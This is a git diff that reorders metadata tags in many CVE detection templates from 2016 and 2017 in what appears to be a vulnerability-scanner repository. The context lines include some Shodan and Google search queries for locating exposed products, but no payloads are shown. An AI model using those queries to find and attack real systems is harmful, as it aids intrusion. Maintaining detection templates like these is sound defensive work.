--- a/http/cves/2016/CVE-2016-1000148.yaml
+++ b/http/cves/2016/CVE-2016-1000148.yaml
@@ -27,7 +27,7 @@ info:
vendor: s3-video_project
product: s3-video
framework: wordpress
- tags: cve,cve2016,wordpress,wp-plugin,xss,wpscan,s3-video_project
+ tags: cve2016,cve,wordpress,wp-plugin,xss,wpscan,s3-video_project
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-1000149.yaml b/http/cves/2016/CVE-2016-1000149.yaml
index 7c442a5430..4f921288a6 100644
--- a/http/cves/2016/CVE-2016-1000149.yaml
+++ b/http/cves/2016/CVE-2016-1000149.yaml
@@ -26,7 +26,7 @@ info:
vendor: simpel-reserveren_project
product: simpel-reserveren
framework: wordpress
- tags: cve,cve2016,wordpress,xss,wp-plugin,simpel-reserveren_project
+ tags: cve2016,cve,wordpress,xss,wp-plugin,simpel-reserveren_project
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-1000152.yaml b/http/cves/2016/CVE-2016-1000152.yaml
index ac10c66468..fd60517a71 100644
--- a/http/cves/2016/CVE-2016-1000152.yaml
+++ b/http/cves/2016/CVE-2016-1000152.yaml
@@ -26,7 +26,7 @@ info:
vendor: tidio-form_project
product: tidio-form
framework: wordpress
- tags: cve,cve2016,wordpress,xss,wp-plugin,tidio-form_project
+ tags: cve2016,cve,wordpress,xss,wp-plugin,tidio-form_project
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-1000153.yaml b/http/cves/2016/CVE-2016-1000153.yaml
index a812814656..2f0e276775 100644
--- a/http/cves/2016/CVE-2016-1000153.yaml
+++ b/http/cves/2016/CVE-2016-1000153.yaml
@@ -26,7 +26,7 @@ info:
vendor: tidio-gallery_project
product: tidio-gallery
framework: wordpress
- tags: cve,cve2016,wordpress,xss,wp-plugin,tidio-gallery_project
+ tags: cve2016,cve,wordpress,xss,wp-plugin,tidio-gallery_project
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-1000154.yaml b/http/cves/2016/CVE-2016-1000154.yaml
index 5292f839a3..1c2c114b7f 100644
--- a/http/cves/2016/CVE-2016-1000154.yaml
+++ b/http/cves/2016/CVE-2016-1000154.yaml
@@ -26,7 +26,7 @@ info:
vendor: browserweb
product: whizz
framework: wordpress
- tags: cve,cve2016,wordpress,xss,wp-plugin,browserweb
+ tags: cve2016,cve,wordpress,xss,wp-plugin,browserweb
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-1000155.yaml b/http/cves/2016/CVE-2016-1000155.yaml
index c3e0fb62b3..18f4faf3fb 100644
--- a/http/cves/2016/CVE-2016-1000155.yaml
+++ b/http/cves/2016/CVE-2016-1000155.yaml
@@ -24,7 +24,7 @@ info:
vendor: wpsolr
product: wpsolr-search-engine
framework: wordpress
- tags: cve,cve2016,wordpress,xss,wp-plugin,wpsolr
+ tags: cve2016,cve,wordpress,xss,wp-plugin,wpsolr
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-10033.yaml b/http/cves/2016/CVE-2016-10033.yaml
index 251d9e949a..49626e4c99 100644
--- a/http/cves/2016/CVE-2016-10033.yaml
+++ b/http/cves/2016/CVE-2016-10033.yaml
@@ -27,7 +27,7 @@ info:
max-request: 2
vendor: phpmailer_project
product: phpmailer
- tags: seclists,cve,cve2016,rce,edb,wordpress,phpmailer_project
+ tags: cve,cve2016,seclists,rce,edb,wordpress,phpmailer_project
http:
- raw:
diff --git a/http/cves/2016/CVE-2016-10108.yaml b/http/cves/2016/CVE-2016-10108.yaml
index cdc749070f..6b9f4d15a3 100644
--- a/http/cves/2016/CVE-2016-10108.yaml
+++ b/http/cves/2016/CVE-2016-10108.yaml
@@ -28,7 +28,7 @@ info:
vendor: western_digital
product: mycloud_nas
shodan-query: http.favicon.hash:-1074357885
- tags: packetstorm,cve,cve2016,rce,oast,wdcloud,western_digital
+ tags: cve2016,cve,packetstorm,rce,oast,wdcloud,western_digital
http:
- raw:
diff --git a/http/cves/2016/CVE-2016-10134.yaml b/http/cves/2016/CVE-2016-10134.yaml
index f336d8c25b..6fcc9b0e45 100644
--- a/http/cves/2016/CVE-2016-10134.yaml
+++ b/http/cves/2016/CVE-2016-10134.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: zabbix
product: zabbix
- tags: cve,cve2016,zabbix,sqli,vulhub
+ tags: cve2016,cve,zabbix,sqli,vulhub
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-10367.yaml b/http/cves/2016/CVE-2016-10367.yaml
index a247e7ddf1..019e840665 100644
--- a/http/cves/2016/CVE-2016-10367.yaml
+++ b/http/cves/2016/CVE-2016-10367.yaml
@@ -27,7 +27,7 @@ info:
vendor: opsview
product: opsview
shodan-query: title:"Opsview"
- tags: cve,cve2016,opsview,lfi
+ tags: cve2016,cve,opsview,lfi
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-10368.yaml b/http/cves/2016/CVE-2016-10368.yaml
index ff01790df3..193390b59e 100644
--- a/http/cves/2016/CVE-2016-10368.yaml
+++ b/http/cves/2016/CVE-2016-10368.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: opsview
product: opsview
- tags: cve,cve2016,redirect,opsview,authenticated
+ tags: cve2016,cve,redirect,opsview,authenticated
http:
- raw:
diff --git a/http/cves/2016/CVE-2016-10924.yaml b/http/cves/2016/CVE-2016-10924.yaml
index 4e62d3a64d..9fc568d9bb 100644
--- a/http/cves/2016/CVE-2016-10924.yaml
+++ b/http/cves/2016/CVE-2016-10924.yaml
@@ -29,7 +29,7 @@ info:
product: zedna_ebook_download
framework: wordpress
google-query: inurl:"/wp-content/plugins/ebook-download"
- tags: cve,wordpress,edb,cve2016,wp-plugin,lfi,ebook,wp,wpscan,zedna_ebook_download_project
+ tags: cve2016,cve,wordpress,edb,wp-plugin,lfi,ebook,wp,wpscan,zedna_ebook_download_project
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-10940.yaml b/http/cves/2016/CVE-2016-10940.yaml
index 3c203a30c5..9d7af3a012 100644
--- a/http/cves/2016/CVE-2016-10940.yaml
+++ b/http/cves/2016/CVE-2016-10940.yaml
@@ -28,7 +28,7 @@ info:
vendor: zm-gallery_project
product: zm-gallery
framework: wordpress
- tags: wpscan,cve,cve2016,sqli,wp,wordpress,wp-plugin,authenticated,zm-gallery_project
+ tags: cve,cve2016,wpscan,sqli,wp,wordpress,wp-plugin,authenticated,zm-gallery_project
http:
- raw:
diff --git a/http/cves/2016/CVE-2016-10960.yaml b/http/cves/2016/CVE-2016-10960.yaml
index 10e466d89e..9d940e85cf 100644
--- a/http/cves/2016/CVE-2016-10960.yaml
+++ b/http/cves/2016/CVE-2016-10960.yaml
@@ -28,7 +28,7 @@ info:
product: wsecure
framework: wordpress
google-query: inurl:"/wp-content/plugins/wsecure"
- tags: cve,cve2016,wordpress,wp-plugin,rce,joomlaserviceprovider
+ tags: cve2016,cve,wordpress,wp-plugin,rce,joomlaserviceprovider
variables:
name: "{{to_lower(rand_text_alpha(5))}}"
diff --git a/http/cves/2016/CVE-2016-10973.yaml b/http/cves/2016/CVE-2016-10973.yaml
index c01f06744c..4c4eeabc6b 100644
--- a/http/cves/2016/CVE-2016-10973.yaml
+++ b/http/cves/2016/CVE-2016-10973.yaml
@@ -27,7 +27,7 @@ info:
vendor: brafton
product: brafton
framework: wordpress
- tags: wpscan,cve,cve2016,wordpress,wp,wp-plugin,xss,brafton,authenticated
+ tags: cve2016,cve,wpscan,wordpress,wp,wp-plugin,xss,brafton,authenticated
http:
- raw:
diff --git a/http/cves/2016/CVE-2016-10993.yaml b/http/cves/2016/CVE-2016-10993.yaml
index 7989e9ea0d..3f9231465b 100644
--- a/http/cves/2016/CVE-2016-10993.yaml
+++ b/http/cves/2016/CVE-2016-10993.yaml
@@ -26,7 +26,7 @@ info:
vendor: scoreme_project
product: scoreme
framework: wordpress
- tags: cve,cve2016,wordpress,wp-theme,xss,scoreme_project
+ tags: cve2016,cve,wordpress,wp-theme,xss,scoreme_project
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-1555.yaml b/http/cves/2016/CVE-2016-1555.yaml
index b8989212d7..44cf215e0a 100644
--- a/http/cves/2016/CVE-2016-1555.yaml
+++ b/http/cves/2016/CVE-2016-1555.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: netgear
product: wnap320_firmware
- tags: seclists,packetstorm,netgear,rce,oast,router,kev,cve,cve2016
+ tags: cve2016,cve,seclists,packetstorm,netgear,rce,oast,router,kev
http:
- raw:
diff --git a/http/cves/2016/CVE-2016-2389.yaml b/http/cves/2016/CVE-2016-2389.yaml
index d4a93e0e45..3281ad6321 100644
--- a/http/cves/2016/CVE-2016-2389.yaml
+++ b/http/cves/2016/CVE-2016-2389.yaml
@@ -28,7 +28,7 @@ info:
vendor: sap
product: netweaver
shodan-query: http.favicon.hash:-266008933
- tags: packetstorm,seclists,lfi,sap,edb,cve,cve2016
+ tags: cve2016,cve,packetstorm,seclists,lfi,sap,edb
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-3081.yaml b/http/cves/2016/CVE-2016-3081.yaml
index e2f2668964..af93490370 100644
--- a/http/cves/2016/CVE-2016-3081.yaml
+++ b/http/cves/2016/CVE-2016-3081.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: apache
product: struts
- tags: cve,cve2016,struts,rce,apache
+ tags: cve2016,cve,struts,rce,apache
http:
- raw:
diff --git a/http/cves/2016/CVE-2016-3088.yaml b/http/cves/2016/CVE-2016-3088.yaml
index 57bd1ccfb3..986c4e9616 100644
--- a/http/cves/2016/CVE-2016-3088.yaml
+++ b/http/cves/2016/CVE-2016-3088.yaml
@@ -27,7 +27,7 @@ info:
max-request: 2
vendor: apache
product: activemq
- tags: fileupload,kev,edb,cve,cve2016,apache,activemq,intrusive
+ tags: cve2016,cve,fileupload,kev,edb,apache,activemq,intrusive
variables:
rand1: '{{rand_int(11111111, 99999999)}}'
diff --git a/http/cves/2016/CVE-2016-3978.yaml b/http/cves/2016/CVE-2016-3978.yaml
index 8b1d247367..084f2b5949 100644
--- a/http/cves/2016/CVE-2016-3978.yaml
+++ b/http/cves/2016/CVE-2016-3978.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: fortinet
product: fortios
- tags: cve2016,redirect,fortinet,fortios,seclists,cve
+ tags: cve2016,cve,redirect,fortinet,fortios,seclists
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-4437.yaml b/http/cves/2016/CVE-2016-4437.yaml
index c50ecad77e..6d26207114 100644
--- a/http/cves/2016/CVE-2016-4437.yaml
+++ b/http/cves/2016/CVE-2016-4437.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: apache
product: shiro
- tags: cve,apache,rce,kev,packetstorm,cve2016,shiro,deserialization,oast
+ tags: cve2016,cve,apache,rce,kev,packetstorm,shiro,deserialization,oast
http:
- raw:
diff --git a/http/cves/2016/CVE-2016-4975.yaml b/http/cves/2016/CVE-2016-4975.yaml
index 0d8034c3b6..8264d2ce35 100644
--- a/http/cves/2016/CVE-2016-4975.yaml
+++ b/http/cves/2016/CVE-2016-4975.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: apache
product: http_server
- tags: cve,cve2016,crlf,apache
+ tags: cve2016,cve,crlf,apache,xss
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-4977.yaml b/http/cves/2016/CVE-2016-4977.yaml
index a1d54ee5da..285320d99d 100644
--- a/http/cves/2016/CVE-2016-4977.yaml
+++ b/http/cves/2016/CVE-2016-4977.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: pivotal
product: spring_security_oauth
- tags: oauth2,oauth,rce,ssti,vulhub,cve,cve2016,spring,pivotal
+ tags: cve2016,cve,oauth2,oauth,rce,ssti,vulhub,spring,pivotal
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-5649.yaml b/http/cves/2016/CVE-2016-5649.yaml
index f7ee34440c..152346145b 100644
--- a/http/cves/2016/CVE-2016-5649.yaml
+++ b/http/cves/2016/CVE-2016-5649.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: netgear
product: dgn2200_firmware
- tags: cve,cve2016,iot,netgear,router,packetstorm
+ tags: cve2016,cve,iot,netgear,router,packetstorm
http:
- raw:
diff --git a/http/cves/2016/CVE-2016-6195.yaml b/http/cves/2016/CVE-2016-6195.yaml
index 45ac6e5af8..31367e5292 100644
--- a/http/cves/2016/CVE-2016-6195.yaml
+++ b/http/cves/2016/CVE-2016-6195.yaml
@@ -30,7 +30,7 @@ info:
vendor: vbulletin
product: vbulletin
shodan-query: title:"Powered By vBulletin"
- tags: cve,cve2016,vbulletin,sqli,forum,edb
+ tags: cve2016,cve,vbulletin,sqli,forum,edb
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-6277.yaml b/http/cves/2016/CVE-2016-6277.yaml
index ba2ec75bcc..2d4a76752a 100644
--- a/http/cves/2016/CVE-2016-6277.yaml
+++ b/http/cves/2016/CVE-2016-6277.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: netgear
product: d6220_firmware
- tags: cve,cve2016,netgear,rce,iot,kev
+ tags: cve2016,cve,netgear,rce,iot,kev
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-6601.yaml b/http/cves/2016/CVE-2016-6601.yaml
index 34864c7675..ee0df9064a 100644
--- a/http/cves/2016/CVE-2016-6601.yaml
+++ b/http/cves/2016/CVE-2016-6601.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: zohocorp
product: webnms_framework
- tags: edb,cve,cve2016,zoho,lfi,webnms,zohocorp
+ tags: cve2016,cve,edb,zoho,lfi,webnms,zohocorp
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-7552.yaml b/http/cves/2016/CVE-2016-7552.yaml
index a0a5ec289d..e790b6d30c 100644
--- a/http/cves/2016/CVE-2016-7552.yaml
+++ b/http/cves/2016/CVE-2016-7552.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: trendmicro
product: threat_discovery_appliance
- tags: msf,cve,cve2016,lfi,auth,bypass,trendmicro
+ tags: cve2016,cve,msf,lfi,auth,bypass,trendmicro
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-7834.yaml b/http/cves/2016/CVE-2016-7834.yaml
index 6b636062db..4f2d22705f 100644
--- a/http/cves/2016/CVE-2016-7834.yaml
+++ b/http/cves/2016/CVE-2016-7834.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: sony
product: snc_series_firmware
- tags: sony,backdoor,unauth,telnet,iot,camera
+ tags: cve2016,cve,sony,backdoor,unauth,telnet,iot,camera
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-7981.yaml b/http/cves/2016/CVE-2016-7981.yaml
index 3e1c0bef30..82269626c3 100644
--- a/http/cves/2016/CVE-2016-7981.yaml
+++ b/http/cves/2016/CVE-2016-7981.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: spip
product: spip
- tags: cve,cve2016,xss,spip
+ tags: cve2016,cve,xss,spip
http:
- method: GET
diff --git a/http/cves/2016/CVE-2016-8527.yaml b/http/cves/2016/CVE-2016-8527.yaml
index db4256e76a..da68123194 100644
--- a/http/cves/2016/CVE-2016-8527.yaml
+++ b/http/cves/2016/CVE-2016-8527.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: hp
product: airwave
- tags: cve2016,aruba,xss,edb,cve,hp
+ tags: cve2016,cve,aruba,xss,edb,hp
http:
- method: GET
diff --git a/http/cves/2017/CVE-2017-0929.yaml b/http/cves/2017/CVE-2017-0929.yaml
index 49bbb457df..e76b958ef9 100644
--- a/http/cves/2017/CVE-2017-0929.yaml
+++ b/http/cves/2017/CVE-2017-0929.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: dnnsoftware
product: dotnetnuke
- tags: dnn,dotnetnuke,hackerone,cve,cve2017,oast,ssrf,dnnsoftware
+ tags: cve2017,cve,dnn,dotnetnuke,hackerone,oast,ssrf,dnnsoftware
http:
- method: GET
diff --git a/http/cves/2017/CVE-2017-1000028.yaml b/http/cves/2017/CVE-2017-1000028.yaml
index c9f6825433..810453e680 100644
--- a/http/cves/2017/CVE-2017-1000028.yaml
+++ b/http/cves/2017/CVE-2017-1000028.yaml
@@ -25,7 +25,7 @@ info:
max-request: 2
vendor: oracle
product: glassfish_server
- tags: oracle,glassfish,lfi,edb,cve,cve2017
+ tags: cve,cve2017,oracle,glassfish,lfi,edb
http:
- method: GET
diff --git a/http/cves/2017/CVE-2017-1000170.yaml b/http/cves/2017/CVE-2017-1000170.yaml
index ee195221b2..b293853a53 100644
--- a/http/cves/2017/CVE-2017-1000170.yaml
+++ b/http/cves/2017/CVE-2017-1000170.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: jqueryfiletree_project
product: jqueryfiletree
- tags: cve,cve2017,wordpress,wp-plugin,lfi,jquery,edb,packetstorm,jqueryfiletree_project
+ tags: cve2017,cve,wordpress,wp-plugin,lfi,jquery,edb,packetstorm,jqueryfiletree_project
http:
- method: POST
diff --git a/http/cves/2017/CVE-2017-1000486.yaml b/http/cves/2017/CVE-2017-1000486.yaml
index 2cf9fa10b4..b3386a6495 100644
--- a/http/cves/2017/CVE-2017-1000486.yaml
+++ b/http/cves/2017/CVE-2017-1000486.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: primetek
product: primefaces
- tags: cve,cve2017,primetek,rce,injection,kev
+ tags: cve2017,cve,primetek,rce,injection,kev
http:
- raw:
diff --git a/http/cves/2017/CVE-2017-10271.yaml b/http/cves/2017/CVE-2017-10271.yaml
index 0f5c302d38..ef6f056226 100644
--- a/http/cves/2017/CVE-2017-10271.yaml
+++ b/http/cves/2017/CVE-2017-10271.yaml
@@ -27,7 +27,7 @@ info:
max-request: 2
vendor: oracle
product: weblogic_server
- tags: weblogic,oast,kev,vulhub,cve,cve2017,rce,oracle
+ tags: cve,cve2017,weblogic,oast,kev,vulhub,rce,oracle
http:
- raw:
diff --git a/http/cves/2017/CVE-2017-10974.yaml b/http/cves/2017/CVE-2017-10974.yaml
index f975386b4a..fd465597b7 100644
--- a/http/cves/2017/CVE-2017-10974.yaml
+++ b/http/cves/2017/CVE-2017-10974.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: yaws
product: yaws
- tags: edb,cve,cve2017,yaws,lfi
+ tags: cve,cve2017,edb,yaws,lfi
http:
- method: GET
diff --git a/http/cves/2017/CVE-2017-11165.yaml b/http/cves/2017/CVE-2017-11165.yaml
index e0bbec12a0..328047db89 100644
--- a/http/cves/2017/CVE-2017-11165.yaml
+++ b/http/cves/2017/CVE-2017-11165.yaml
@@ -29,7 +29,7 @@ info:
vendor: datataker
product: dt80_dex_firmware
shodan-query: http.title:"datataker"
- tags: lfr,edb,cve,cve2017,datataker,config,packetstorm,exposure
+ tags: cve2017,cve,lfr,edb,datataker,config,packetstorm,exposure
http:
- method: GET
diff --git a/http/cves/2017/CVE-2017-11444.yaml b/http/cves/2017/CVE-2017-11444.yaml
index 0891277a11..6eaa521fa7 100644
--- a/http/cves/2017/CVE-2017-11444.yaml
+++ b/http/cves/2017/CVE-2017-11444.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: intelliants
product: subrion_cms
- tags: cve,cve2017,sqli,subrion,intelliants
+ tags: cve2017,cve,sqli,subrion,intelliants
http:
- method: GET
diff --git a/http/cves/2017/CVE-2017-11610.yaml b/http/cves/2017/CVE-2017-11610.yaml
index f71e5d3ec6..a45de21ddf 100644
--- a/http/cves/2017/CVE-2017-11610.yaml
+++ b/http/cves/2017/CVE-2017-11610.yaml
@@ -28,7 +28,7 @@ info:
vendor: supervisord
product: supervisor
shodan-query: http.title:"Supervisor Status"
- tags: oast,xmlrpc,msf,cve,cve2017,rce,supervisor,supervisord
+ tags: cve2017,cve,oast,xmlrpc,msf,rce,supervisor,supervisord
http:
- raw:
diff --git a/http/cves/2017/CVE-2017-12149.yaml b/http/cves/2017/CVE-2017-12149.yaml
index f18f626b3c..a9011973b0 100644
--- a/http/cves/2017/CVE-2017-12149.yaml
+++ b/http/cves/2017/CVE-2017-12149.yaml
@@ -27,7 +27,7 @@ info:
max-request: 3
vendor: redhat
product: jboss_enterprise_application_platform
- tags: java,rce,deserialization,kev,vulhub,cve,cve2017,jboss,intrusive,redhat
+ tags: cve2017,cve,java,rce,deserialization,kev,vulhub,jboss,intrusive,redhat
http:
- raw:
diff --git a/http/cves/2017/CVE-2017-12542.yaml b/http/cves/2017/CVE-2017-12542.yaml
index 8508cc091f..b823b6610c 100644
--- a/http/cves/2017/CVE-2017-12542.yaml
+++ b/http/cves/2017/CVE-2017-12542.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: hp
product: integrated_lights-out_4_firmware
- tags: ilo4,hpe,auth-bypass,edb,cve,cve2017,hp
+ tags: cve,cve2017,ilo4,hpe,auth-bypass,edb,hp
http:
- method: GET
diff --git a/http/cves/2017/CVE-2017-12615.yaml b/http/cves/2017/CVE-2017-12615.yaml
index 398bdf9076..42ad8eb856 100644
--- a/http/cves/2017/CVE-2017-12615.yaml
+++ b/http/cves/2017/CVE-2017-12615.yaml
@@ -29,7 +29,7 @@ info:
vendor: apache
product: tomcat
shodan-query: title:"Apache Tomcat"
- tags: rce,tomcat,kev,vulhub,cve,cve2017,apache,fileupload,intrusive
+ tags: cve2017,cve,rce,tomcat,kev,vulhub,apache,fileupload,intrusive
http:
- method: PUT
diff --git a/http/cves/2017/CVE-2017-12617.yaml b/http/cves/2017/CVE-2017-12617.yaml
index 9074f5f73d..fbd5db346e 100644
--- a/http/cves/2017/CVE-2017-12617.yaml
+++ b/http/cves/2017/CVE-2017-12617.yaml
@@ -30,7 +30,7 @@ info:
vendor: apache
product: tomcat
shodan-query: html:"Apache Tomcat"
- tags: cve,cve2017,tomcat,apache,rce,kev,intrusive
+ tags: cve2017,cve,tomcat,apache,rce,kev,intrusive
http:
- raw:
diff --git a/http/cves/2017/CVE-2017-12629.yaml b/http/cves/2017/CVE-2017-12629.yaml
index f3d37d4cd4..0f854e5879 100644
--- a/http/cves/2017/CVE-2017-12629.yaml
+++ b/http/cves/2017/CVE-2017-12629.yaml
@@ -27,7 +27,7 @@ info:
max-request: 2
vendor: apache
product: solr
- tags: oast,xxe,vulhub,cve,cve2017,solr,apache
+ tags: cve2017,cve,oast,xxe,vulhub,solr,apache
http:
- raw:
diff --git a/http/cves/2017/CVE-2017-12635.yaml b/http/cves/2017/CVE-2017-12635.yaml
index 43623e793f..7ea440f6ec 100644
--- a/http/cves/2017/CVE-2017-12635.yaml
+++ b/http/cves/2017/CVE-2017-12635.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: apache
product: couchdb
- tags: cve,cve2017,couchdb,apache,intrusive
+ tags: cve2017,cve,couchdb,apache,intrusive
http:
- raw:
diff --git a/http/cves/2017/CVE-2017-12637.yaml b/http/cves/2017/CVE-2017-12637.yaml
index cc69e3f2c3..0b0f910e74 100644
--- a/http/cves/2017/CVE-2017-12637.yaml
+++ b/http/cves/2017/CVE-2017-12637.yaml
@@ -27,7 +27,7 @@ info:
vendor: sap
product: netweaver_application_server_java
shodan-query: http.favicon.hash:-266008933
- tags: cve,cve2017,sap,lfi,java,traversal
+ tags: cve2017,cve,sap,lfi,java,traversal
http:
- method: GET
diff --git a/http/cves/2017/CVE-2017-12794.yaml b/http/cves/2017/CVE-2017-12794.yaml
index ab73021ea5..7fa8eec96e 100644
--- a/http/cves/2017/CVE-2017-12794.yaml
+++ b/http/cves/2017/CVE-2017-12794.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: djangoproject
product: django
- tags: xss,django,cve,cve2017,djangoproject
+ tags: cve2017,cve,xss,django,djangoproject
http:
- method: GET
diff --git a/http/cves/2017/CVE-2017-14135.yaml b/http/cves/2017/CVE-2017-14135.yaml
index c70116e62b..5e6bb47f0b 100644
--- a/http/cves/2017/CVE-2017-14135.yaml
+++ b/http/cves/2017/CVE-2017-14135.yaml
@@ -27,7 +27,7 @@ info:
vendor: dreambox
product: opendreambox
shodan-query: title:"Dreambox WebControl"
- tags: cve2017,dreambox,rce,oast,edb,cve
+ tags: cve,cve2017,dreambox,rce,oast,edb
http:
- raw:
diff --git a/http/cves/2017/CVE-2017-14186.yaml b/http/cves/2017/CVE-2017-14186.yaml
index 3da75fbe4d..0b71be2d32 100644
--- a/http/cves/2017/CVE-2017-14186.yaml
+++ b/http/cves/2017/CVE-2017-14186.yaml
@@ -30,7 +30,7 @@ info:
vendor: fortinet
product: fortios
shodan-query: port:10443 http.favicon.hash:945408572
- tags: cve,cve2017,fortigate,xss,fortinet
+ tags: cve2017,cve,fortigate,xss,fortinet
http:
- method: GET
diff --git a/http/cves/2017/CVE-2017-14524.yaml b/http/cves/2017/CVE-2017-14524.yaml
index 7d2a1c2af1..bc7d6a1952 100644
--- a/http/cves/2017/CVE-2017-14524.yaml
+++ b/http/cves/2017/CVE-2017-14524.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: opentext
product: documentum_administrator
- tags: cve,cve2017,redirect,opentext,seclists
+ tags: cve2017,cve,redirect,opentext,seclists
http:
- method: GET
diff --git a/http/cves/2017/CVE-2017-14622.yaml b/http/cves/2017/CVE-2017-14622.yaml
index f057b6a698..70d699a3e9 100644
--- a/http/cves/2017/CVE-2017-14622.yaml
+++ b/http/cves/2017/CVE-2017-14622.yaml
@@ -29,7 +29,7 @@ info:
vendor: 2kblater
product: 2kb_amazon_affiliates_store
framework: wordpress
- tags: xss,wordpress,wp-plugin,wp,2kb-amazon-affiliates-store,authenticated,packetstorm,2kblater
+ tags: cve2017,cve,xss,wordpress,wp-plugin,wp,2kb-amazon-affiliates-store,authenticated,packetstorm,2kblater
http:
- raw:
diff --git a/http/cves/2017/CVE-2017-14849.yaml b/http/cves/2017/CVE-2017-14849.yaml
index ab037ec119..605aa31356 100644
--- a/http/cves/2017/CVE-2017-14849.yaml
+++ b/http/cves/2017/CVE-2017-14849.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: nodejs
product: node.js
- tags: cve,cve2017,nodejs,lfi
+ tags: cve2017,cve,nodejs,lfi
http:
- method: GET
diff --git a/http/cves/2017/CVE-2017-15287.yaml b/http/cves/2017/CVE-2017-15287.yaml
index d8bc45f000..9f6840d6f4 100644
--- a/http/cves/2017/CVE-2017-15287.yaml
+++ b/http/cves/2017/CVE-2017-15287.yaml
@@ -27,7 +27,7 @@ info:
vendor: bouqueteditor_project
product: bouqueteditor
framework: dreambox
- tags: dreambox,edb,cve,cve2017,xss,bouqueteditor_project
+ tags: cve,cve2017,dreambox,edb,xss,bouqueteditor_project
http:
- raw:
diff --git a/http/cves/2017/CVE-2017-15647.yaml b/http/cves/2017/CVE-2017-15647.yaml
index 6fde3c1850..48c637a293 100644
--- a/http/cves/2017/CVE-2017-15647.yaml
+++ b/http/cves/2017/CVE-2017-15647.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: fiberhome
product: routerfiberhome_firmware
- tags: lfi,router,edb,cve,cve2017,fiberhome
+ tags: cve,cve2017,lfi,router,edb,fiberhome
http:
- method: GET
diff --git a/http/cves/2017/CVE-2017-15715.yaml b/http/cves/2017/CVE-2017-15715.yaml
index 1ee0b87025..a4bbce1f07 100644
--- a/http/cves/2017/CVE-2017-15715.yaml
+++ b/http/cves/2017/CVE-2017-15715.yaml
@@ -27,7 +27,7 @@ info:
max-request: 2
vendor: apache
product: http_server
- tags: apache,httpd,fileupload,vulhub,cve,cve2017,intrusive
+ tags: cve,cve2017,apache,httpd,fileupload,vulhub,intrusive
http:
- raw:
diff --git a/http/cves/2017/CVE-2017-15944.yaml b/http/cves/2017/CVE-2017-15944.yaml
index 54a89b4589..083f59abd2 100644
--- a/http/cves/2017/CVE-2017-15944.yaml
+++ b/http/cves/2017/CVE-2017-15944.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: paloaltonetworks
product: pan-os
- tags: kev,edb,cve,cve2017,rce,vpn,panos,globalprotect,paloaltonetworks
+ tags: cve2017,cve,kev,edb,rce,vpn,panos,globalprotect,paloaltonetworks
http:
- raw:
diff --git a/http/cves/2017/CVE-2017-16806.yaml b/http/cves/2017/CVE-2017-16806.yaml
index c1573f9479..c709f70d57 100644
--- a/http/cves/2017/CVE-2017-16806.yaml
+++ b/http/cves/2017/CVE-2017-16806.yaml
@@ -26,7 +26,7 @@ info:
max-request: 2
vendor: ulterius
product: ulterius_server
- tags: cve2017,ulterius,traversal,edb,cve
+ tags: cve2017,cve,ulterius,traversal,edb
http:
- method: GET
diff --git a/http/cves/2017/CVE-2017-16894.yaml b/http/cves/2017/CVE-2017-16894.yaml
index 7c8c7b0124..088d72d7bd 100644
--- a/http/cves/2017/CVE-2017-16894.yaml
+++ b/http/cves/2017/CVE-2017-16894.yaml
@@ -31,7 +31,7 @@ info:
product: laravel
shodan-query: Laravel-Framework
fofa-query: app="Laravel-Framework"
- tags: cve2017,laravel,exposure,packetstorm,cve
+ tags: cve,cve2017,laravel,exposure,packetstorm
http:
- method: GET
diff --git a/http/cves/2017/CVE-2017-17043.yaml b/http/cves/2017/CVE-2017-17043.yaml
index bc046d444f..de7ec80a47 100644
--- a/http/cves/2017/CVE-2017-17043.yaml
+++ b/http/cves/2017/CVE-2017-17043.yaml
@@ -27,7 +27,7 @@ info:
vendor: zitec
product: emag_marketplace_connector
framework: wordpress
- tags: xss,wp-plugin,packetstorm,cve,cve2017,wordpress,zitec
+ tags: cve,cve2017,xss,wp-plugin,packetstorm,wordpress,zitec
http:
- method: GET
